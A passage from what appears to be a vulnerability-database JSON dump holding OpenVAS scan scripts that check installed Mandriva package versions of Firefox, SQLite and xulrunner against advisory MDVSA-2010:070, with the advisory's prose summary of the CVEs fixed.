}\n\n if ((res = isrpmvuln(pkg:\"firefox-nl\", rpm:\"firefox-nl~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nn_NO\", rpm:\"firefox-nn_NO~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pa_IN\", rpm:\"firefox-pa_IN~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pl\", rpm:\"firefox-pl~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_BR\", rpm:\"firefox-pt_BR~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_PT\", rpm:\"firefox-pt_PT~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ro\", rpm:\"firefox-ro~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ru\", rpm:\"firefox-ru~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-si\", rpm:\"firefox-si~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sk\", rpm:\"firefox-sk~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sl\", rpm:\"firefox-sl~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sq\", rpm:\"firefox-sq~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sv_SE\", rpm:\"firefox-sv_SE~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-te\", rpm:\"firefox-te~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-th\", rpm:\"firefox-th~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-theme-kfirefox\", rpm:\"firefox-theme-kfirefox~0.16~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-tr\", rpm:\"firefox-tr~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-uk\", rpm:\"firefox-uk~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_CN\", rpm:\"firefox-zh_CN~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_TW\", rpm:\"firefox-zh_TW~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-extras\", rpm:\"gnome-python-extras~2.19.1~20.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gda\", rpm:\"gnome-python-gda~2.19.1~20.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gda-devel\", rpm:\"gnome-python-gda-devel~2.19.1~20.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gdl\", rpm:\"gnome-python-gdl~2.19.1~20.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkhtml2\", rpm:\"gnome-python-gtkhtml2~2.19.1~20.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkmozembed\", rpm:\"gnome-python-gtkmozembed~2.19.1~20.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkspell\", rpm:\"gnome-python-gtkspell~2.19.1~20.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lemon\", rpm:\"lemon~3.6.23.1~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdevhelp-1_0\", rpm:\"libdevhelp-1_0~0.21~3.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdevhelp-1-devel\", rpm:\"libdevhelp-1-devel~0.21~3.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3_0\", rpm:\"libsqlite3_0~3.6.23.1~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3-devel\", rpm:\"libsqlite3-devel~3.6.23.1~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3-static-devel\", rpm:\"libsqlite3-static-devel~3.6.23.1~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner1.9.2.3\", rpm:\"libxulrunner1.9.2.3~1.9.2.3~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner-devel\", rpm:\"libxulrunner-devel~1.9.2.3~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-beagle\", rpm:\"mozilla-thunderbird-beagle~0.3.8~13.19mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sqlite3-tools\", rpm:\"sqlite3-tools~3.6.23.1~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tcl-sqlite3\", rpm:\"tcl-sqlite3~3.6.23.1~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~1.9.2.3~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"yelp\", rpm:\"yelp~2.24.0~3.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-l10n\", rpm:\"firefox-l10n~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sqlite3\", rpm:\"sqlite3~3.6.23.1~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64devhelp-1_0\", rpm:\"lib64devhelp-1_0~0.21~3.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64devhelp-1-devel\", rpm:\"lib64devhelp-1-devel~0.21~3.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3_0\", rpm:\"lib64sqlite3_0~3.6.23.1~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3-devel\", rpm:\"lib64sqlite3-devel~3.6.23.1~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3-static-devel\", rpm:\"lib64sqlite3-static-devel~3.6.23.1~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner1.9.2.3\", rpm:\"lib64xulrunner1.9.2.3~1.9.2.3~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner-devel\", rpm:\"lib64xulrunner-devel~1.9.2.3~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0176", "CVE-2010-0165", "CVE-2010-0168", "CVE-2010-0174", "CVE-2010-0172", "CVE-2010-0175", "CVE-2010-0170", "CVE-2010-0167", "CVE-2010-1122", "CVE-2010-0164", "CVE-2010-0173", "CVE-2010-0178", "CVE-2010-0177", "CVE-2009-3555", "CVE-2010-0182", "CVE-2010-0181", "CVE-2010-1028", "CVE-2010-0179"], "description": "Check for the Version of firefox", "modified": "2017-12-26T00:00:00", "published": "2010-04-16T00:00:00", "id": "OPENVAS:830981", "href": "http://plugins.openvas.org/nasl.php?oid=830981", "type": "openvas", "title": "Mandriva Update for firefox MDVSA-2010:070 (firefox)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for firefox MDVSA-2010:070 (firefox)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Security issues were identified and fixed in firefox:\n\n Security researcher regenrecht reported (via TippingPoint's Zero Day\n Initiative) a potential reuse of a deleted image frame in Firefox 3.6's\n handling of multipart/x-mixed-replace images. Although no exploit was\n shown, re-use of freed memory has led to exploitable vulnerabilities\n in the past (CVE-2010-0164).\n \n Mozilla developers identified and fixed several stability bugs in the\n browser engine used in Firefox and other Mozilla-based products. Some\n of these crashes showed evidence of memory corruption under certain\n circumstances and we presume that with enough effort at least some\n of these could be exploited to run arbitrary code (CVE-2010-0165,\n CVE-2010-0167).\n \n Mozilla developer Josh Soref of Nokia reported that documents\n failed to call certain security checks when attempting to preload\n images. Although the image content is not available to the page, it\n is possible to specify protocols that are normally not allowed in a\n web page such as file:. This includes internal schemes implemented\n by add-ons that might perform privileged actions resulting in\n something like a Cross-Site Request Forgery (CSRF) attack against\n the add-on. Potential severity would depend on the add-ons installed\n (CVE-2010-0168).\n \n Mozilla developer Blake Kaplan reported that the window.location object\n was made a normal overridable JavaScript object in the Firefox 3.6\n browser engine (Gecko 1.9.2) because new mechanisms were developed\n to enforce the same-origin policy between windows and frames. This\n object is unfortunately also used by some plugins to determine the page\n origin used for access restrictions. A malicious page could override\n this object to fool a plugin into granting access to data on another\n site or the local file system. The behavior of older Firefox versions\n has been restored (CVE-2010-0170).\n \n Mozilla developer Justin Dolske reported that the new asynchronous\n Authorization Prompt (HTTP username and password) was not always\n attached to the correct window. Although we have not demonstrated\n this, it may be possible for a malicious page to convince a user\n to open a new tab or popup to a trusted service and then have the\n HTTP authorization prompt from the malicious page appear to be the\n login prompt for the trusted page. This potential attack is greatly\n mitigat ... \n\n Description truncated, for more information please check the Reference URL\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"firefox on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2009.1,\n Mandriva Linux 2009.1/X86_64,\n Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-04/msg00007.php\");\n script_id(830981);\n script_version(\"$Revision: 8245 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-26 07:29:59 +0100 (Tue, 26 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-16 17:02:11 +0200 (Fri, 16 Apr 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2010:070\");\n script_cve_id(\"CVE-2010-0164\", \"CVE-2010-0165\", \"CVE-2010-0167\", \"CVE-2010-0168\", \"CVE-2010-0170\", \"CVE-2010-0172\", \"CVE-2010-1028\", \"CVE-2010-1122\", \"CVE-2010-0173\", \"CVE-2010-0174\", \"CVE-2010-0175\", \"CVE-2010-0176\", \"CVE-2010-0177\", \"CVE-2010-0178\", \"CVE-2010-0179\", \"CVE-2010-0181\", \"CVE-2010-0182\", \"CVE-2009-3555\");\n script_name(\"Mandriva Update for firefox MDVSA-2010:070 (firefox)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of firefox\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-af\", rpm:\"firefox-af~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ar\", rpm:\"firefox-ar~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-be\", rpm:\"firefox-be~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bg\", rpm:\"firefox-bg~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bn\", rpm:\"firefox-bn~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ca\", rpm:\"firefox-ca~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cs\", rpm:\"firefox-cs~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cy\", rpm:\"firefox-cy~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-da\", rpm:\"firefox-da~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-de\", rpm:\"firefox-de~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-devel\", rpm:\"firefox-devel~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-el\", rpm:\"firefox-el~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-en_GB\", rpm:\"firefox-en_GB~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eo\", rpm:\"firefox-eo~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_AR\", rpm:\"firefox-es_AR~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_ES\", rpm:\"firefox-es_ES~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-et\", rpm:\"firefox-et~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eu\", rpm:\"firefox-eu~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-blogrovr\", rpm:\"firefox-ext-blogrovr~1.1.804~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-scribefire\", rpm:\"firefox-ext-scribefire~3.5.1~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-xmarks\", rpm:\"firefox-ext-xmarks~3.5.10~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fi\", rpm:\"firefox-fi~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fr\", rpm:\"firefox-fr~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fy\", rpm:\"firefox-fy~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ga_IE\", rpm:\"firefox-ga_IE~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gl\", rpm:\"firefox-gl~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gu_IN\", rpm:\"firefox-gu_IN~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-he\", rpm:\"firefox-he~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hi\", rpm:\"firefox-hi~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hu\", rpm:\"firefox-hu~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-id\", rpm:\"firefox-id~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-is\", rpm:\"firefox-is~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-it\", rpm:\"firefox-it~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ja\", rpm:\"firefox-ja~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-kn\", rpm:\"firefox-kn~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ko\", rpm:\"firefox-ko~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lt\", rpm:\"firefox-lt~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lv\", rpm:\"firefox-lv~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mk\", rpm:\"firefox-mk~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mr\", rpm:\"firefox-mr~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nb_NO\", rpm:\"firefox-nb_NO~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nl\", rpm:\"firefox-nl~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nn_NO\", rpm:\"firefox-nn_NO~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pa_IN\", rpm:\"firefox-pa_IN~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pl\", rpm:\"firefox-pl~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_BR\", rpm:\"firefox-pt_BR~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_PT\", rpm:\"firefox-pt_PT~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ro\", rpm:\"firefox-ro~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ru\", rpm:\"firefox-ru~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-si\", rpm:\"firefox-si~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sk\", rpm:\"firefox-sk~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sl\", rpm:\"firefox-sl~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sq\", rpm:\"firefox-sq~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sv_SE\", rpm:\"firefox-sv_SE~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-te\", rpm:\"firefox-te~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-th\", rpm:\"firefox-th~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-tr\", rpm:\"firefox-tr~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-uk\", rpm:\"firefox-uk~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_CN\", rpm:\"firefox-zh_CN~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 